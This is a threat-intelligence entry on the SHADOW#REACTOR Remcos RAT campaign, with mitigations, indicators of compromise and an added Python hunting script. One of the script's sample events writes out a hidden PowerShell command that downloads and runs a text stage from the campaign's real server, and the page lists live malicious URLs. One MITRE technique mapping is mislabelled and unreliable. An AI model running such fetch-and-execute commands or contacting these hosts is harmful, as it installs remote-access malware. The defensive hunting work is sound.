SHADOW#REACTOR – Text-Only Staging, .NET Reactor, and In-Memory Remcos RAT Deployments
This analysis examines a multi-stage Windows malware campaign called SHADOW#REACTOR. The infection chain uses obfuscated VBS, PowerShell downloaders, and text-based payloads to deliver a Remcos RAT backdoor. Key features include fragmented text staging, .NET Reactor protection, reflective loading, and MSBuild abuse as a living-off-the-land binary. The campaign leverages complex obfuscation and in-memory execution to evade detection while establishing persistent remote access. Defensive recommendations focus on script execution monitoring, LOLBin abuse detection, and enhanced PowerShell logging to counter the sophisticated evasion techniques employed.
AI Analysis
Technical Summary
The SHADOW#REACTOR campaign represents a complex Windows malware infection chain that delivers the Remcos Remote Access Trojan (RAT) through multiple sophisticated stages. Initial infection vectors involve obfuscated Visual Basic Script (VBS) and PowerShell downloaders that retrieve fragmented, text-only payloads from remote servers. These payloads are staged in a fragmented manner to evade signature-based detection. The campaign employs .NET Reactor, a commercial obfuscation and protection tool, to shield its components from reverse engineering and static analysis. Reflective loading techniques are used to execute code directly in memory, avoiding writing malicious binaries to disk and thus evading traditional antivirus and endpoint detection systems. A notable living-off-the-land technique is the abuse of MSBuild.exe, a legitimate Microsoft build tool, to execute malicious code without raising immediate suspicion. This abuse aligns with MITRE ATT&CK techniques T1219 (Signed Binary Proxy Execution) and T1047 (Windows Management Instrumentation). The Remcos RAT deployed provides attackers with persistent remote access, enabling data exfiltration, system control, and further lateral movement. The campaign’s obfuscation and in-memory execution complicate detection and forensic analysis. Indicators of compromise include multiple file hashes, IP addresses, and URLs linked to the malware’s infrastructure. Defensive recommendations emphasize enhanced PowerShell logging (to capture script execution details), monitoring for living-off-the-land binary (LOLBin) abuse such as MSBuild, and vigilant script execution monitoring to detect anomalous behaviors. Although no CVE or known exploits are currently associated, the campaign’s complexity and stealth techniques pose a significant threat to Windows-based environments.
Potential Impact
For European organizations, SHADOW#REACTOR poses a medium-level threat primarily targeting Windows environments that utilize MSBuild and PowerShell extensively. The campaign’s ability to evade detection through obfuscation, in-memory execution, and living-off-the-land techniques increases the risk of prolonged undetected intrusions. This can lead to unauthorized remote access, data theft, espionage, and potential disruption of critical business operations. Industries with high reliance on Microsoft development tools and scripting, such as software development firms, financial institutions, and government agencies, are particularly vulnerable. The persistent presence of Remcos RAT can facilitate lateral movement within networks, increasing the potential scope of compromise. The use of fragmented text-only staging and reflective loading complicates incident response and malware removal efforts. Although no widespread exploitation is reported yet, the campaign’s stealth and persistence capabilities could enable targeted attacks against strategic European sectors, including critical infrastructure and technology companies.
Mitigation Recommendations
1. Implement comprehensive PowerShell logging and enable module logging, script block logging, and transcription to capture detailed execution data for forensic analysis.
2. Monitor and restrict the use of living-off-the-land binaries (LOLBins) such as MSBuild.exe, especially for non-standard execution contexts, using application whitelisting and behavioral analytics.
3. Deploy endpoint detection and response (EDR) solutions capable of detecting reflective loading and in-memory execution techniques.
4. Enforce strict script execution policies via Group Policy Objects (GPOs) to limit the execution of unsigned or unauthorized scripts, including VBS and PowerShell scripts.
5. Conduct regular threat hunting exercises focusing on anomalous script execution, network connections to known malicious IPs and URLs, and unusual MSBuild activity.
6. Maintain updated threat intelligence feeds and integrate indicators of compromise (IOCs) such as hashes and IP addresses into security monitoring tools.
7. Educate users on the risks of executing unsolicited scripts or opening suspicious attachments to reduce the likelihood of initial infection.
8. Segment networks to limit lateral movement opportunities for attackers who gain initial access.
9. Regularly audit and harden Windows environments to minimize attack surface, including disabling unnecessary scripting engines where possible.
10. Utilize sandboxing and behavioral analysis tools to detect obfuscated and reflective malware payloads during the initial infection stages.
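The following is an added example, not code from the AlienVault pulse or the Securonix report it references. It turns recommendations 2, 5 and 6 into hunting rules and runs them over constructed process-creation events: MSBuild.exe spawned by a script host or handed an input that is not a project file (the "non-standard execution context" above), PowerShell invoking a download primitive against a raw-IP URL ending in .txt or .vbs (the text-only staging the page describes), and the page's own network indicators appearing in a command line. The field names (image, parent_image, command_line) follow a Sysmon-style process-creation event, the project-file extension allowlist is an assumption to tune per estate, and the sample paths and events are constructed; only the IP addresses and URL come from this page's IoC list.

```python
"""Hunting rules for the behaviours this page describes, run over constructed
process-creation events (example code added to this page; not from the
AlienVault pulse or the Securonix write-up it references)."""
import re
from typing import Dict, List

Event = Dict[str, str]  # assumed Sysmon-style fields: id, image, parent_image, command_line

# Script hosts the page names as the campaign's first stages (VBS via wscript/cscript, PowerShell).
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "powershell.exe", "pwsh.exe"}
# Inputs MSBuild is normally handed in a legitimate build: an assumed allowlist, tune to your estate.
PROJECT_EXTENSIONS = {".sln", ".csproj", ".vbproj", ".fsproj", ".proj", ".targets", ".props"}
# Network indicators taken from this page's IoC list.
NETWORK_IOCS = ["193.24.123.232", "91.202.233.215"]

DOWNLOAD_PRIMITIVES = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient|start-bitstransfer",
    re.IGNORECASE,
)
# http(s) URL with a bare IPv4 host whose path ends in .txt or .vbs: the text-only staging the page describes.
RAW_IP_TEXT_URL = re.compile(
    r"https?://(?:\d{1,3}\.){3}\d{1,3}(?::\d+)?/\S*?\.(?:txt|vbs)\b", re.IGNORECASE
)
# Split a Windows command line into arguments, honouring double quotes.
ARG_TOKEN = re.compile(r'"([^"]*)"|(\S+)')


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def arguments(command_line: str) -> List[str]:
    tokens = [quoted or bare for quoted, bare in ARG_TOKEN.findall(command_line)]
    return tokens[1:]  # drop the executable itself


def evaluate(event: Event) -> List[str]:
    """Return the names of every rule the event trips (empty list if none)."""
    hits: List[str] = []
    image = basename(event["image"])
    parent = basename(event["parent_image"])
    cmd = event["command_line"]

    if image == "msbuild.exe":
        # Recommendation 2: MSBuild launched from a script host rather than a build tool or IDE.
        if parent in SCRIPT_HOSTS:
            hits.append("msbuild_spawned_by_script_host")
        # Recommendation 2: MSBuild handed something other than a project file.
        for arg in arguments(cmd):
            if arg.startswith(("/", "-")):
                continue  # a switch such as /p:Configuration=Release, not an input file
            name = basename(arg)
            ext = name[name.rfind("."):] if "." in name else ""
            if ext not in PROJECT_EXTENSIONS:
                hits.append("msbuild_nonproject_input")
                break

    if (image in {"powershell.exe", "pwsh.exe"}
            and DOWNLOAD_PRIMITIVES.search(cmd) and RAW_IP_TEXT_URL.search(cmd)):
        # Recommendation 5: a PowerShell downloader pulling a text stage from a raw IP address.
        hits.append("powershell_text_stage_download")

    if any(ioc in cmd for ioc in NETWORK_IOCS):
        # Recommendation 6: this page's network indicators surfacing in a command line.
        hits.append("known_ioc_in_command_line")
    return hits


def hunt(events: List[Event]) -> Dict[str, List[str]]:
    """Map event id -> tripped rules, keeping only events that tripped something."""
    findings: Dict[str, List[str]] = {}
    for event in events:
        hits = evaluate(event)
        if hits:
            findings[event["id"]] = hits
    return findings


# Constructed sample events: a legitimate build, two events mirroring the chain on this page, a legitimate download.
SAMPLE_EVENTS: List[Event] = [
    {"id": "evt-1",
     "parent_image": r"C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\devenv.exe",
     "image": r"C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Current\Bin\MSBuild.exe",
     "command_line": "MSBuild.exe MyApp.csproj /p:Configuration=Release"},
    {"id": "evt-2",
     "parent_image": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -w hidden -c \"IEX((New-Object Net.WebClient)"
                     ".DownloadString('http://91.202.233.215/t/qpwoe64.txt'))\""},
    {"id": "evt-3",
     "parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "command_line": r"MSBuild.exe C:\Users\Public\stage.txt"},  # constructed path, not from the page
    {"id": "evt-4",
     "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": 'powershell.exe -Command "Invoke-WebRequest -Uri https://updates.example.com/agent.msi -OutFile agent.msi"'},
]

if __name__ == "__main__":
    for event_id, rules in hunt(SAMPLE_EVENTS).items():
        print(event_id, "->", ", ".join(rules))
```

Run as a script it reports evt-2 and evt-3 only: the Visual Studio build and the hostname-based download in evt-1 and evt-4 trip nothing, which is the point of pairing the MSBuild rules with a parent-process and input-file condition instead of alerting on every MSBuild launch. The script-block and module logging from recommendation 1 is what makes the decoded PowerShell content available when a command line is obfuscated beyond what these regexes see on the raw command line.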
Affected Countries
Germany, France, United Kingdom, Netherlands, Italy, Spain, Poland
Indicators of Compromise
- hash: 21f1da8b05ab5f52520fc8febe1f7746
- hash: 75bc24315a945d4d88f1514a7a239381
- hash: 48cf1b1d29cb3a2dab7e63cdb4f953496672a744
- hash: d4416febc8510e042a6bed5e50a343d3ce4caac3
- hash: 1106b820450d0962abf503c80fda44a890e4245555b97ba7656c7329c0ea2313
- hash: 1fd111954e3eefeef07557345918ea6527898b741dfd9242ff4f5c2ddceaa5e9
- hash: 507c97cc711818eb03cfffd3743cebb43820eeafa5c962c03840f379592d2df5
- hash: 90d552da574192494b4280a1ee733f0c8238f5e07e80b31f4b8e028ba88ee7ea
- hash: 985513b27391b0f9d6d0e498b5cec35df9028a5af971b943170327478d976559
- hash: a35a036b9b6a7baa194aef2eb9b23992b53058d68df6a4f72815e721a93b8d41
- ip: 193.24.123.232
- ip: 91.202.233.215
- url: http://91.202.233.215/config.txt
- url: http://91.202.233.215/t/qpwoe32.txt
- url: http://91.202.233.215/t/qpwoe64.txt
- url: http://91.202.233.215/win64.vbs
Technical Details
- Author: AlienVault
- TLP: white
- References: https://www.securonix.com/blog/shadowreactor-text-only-staging-net-reactor-and-in-memory-remcos-rat-deployment/
- Adversary: null
- Pulse Id: 69666ffc29ff0976c2de82b9
- Threat Score: null
Threat ID: 69667238a60475309f879f30
Added to database: 1/13/2026, 4:26:32 PM
Last enriched: 1/13/2026, 4:43:22 PM
Last updated: 1/14/2026, 3:54:45 AM